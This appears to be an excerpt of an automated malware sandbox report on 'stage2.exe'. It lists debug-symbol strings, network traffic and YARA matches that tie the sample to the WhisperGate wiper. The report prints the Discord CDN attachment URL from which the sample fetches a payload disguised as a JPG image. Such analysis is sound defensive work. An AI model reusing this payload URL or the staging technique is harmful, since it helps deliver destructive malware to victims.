    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Networking:

    Yara detected MSILDownloaderGeneric
    Source: Yara match File source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR
    Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global traffic HTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
    Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
    Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
    Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Mon, 17 Jan 2022 01:25:24 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: close CF-Ray: 6cebca1adc534a68-FRA Cache-Control: private, max-age=0 Expires: Mon, 17 Jan 2022 01:25:24 GMT Vary: Accept-Encoding CF-Cache-Status: MISS Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
    Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp String found in binary or memory: http://cdn.discordapp.com
    Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png$
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
    Source: Amcache.hve.26.dr String found in binary or memory: http://upx.sf.net
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com
    Source: stage2.exe String found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com4
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester$
    Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
    Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemetry)
    Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
    Source: global traffic HTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
    Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2

    System Summary:

    Source: stage2.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: stage2.exe, type: SAMPLE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: stage2.exe, type: SAMPLE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: stage2.exe, type: SAMPLE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
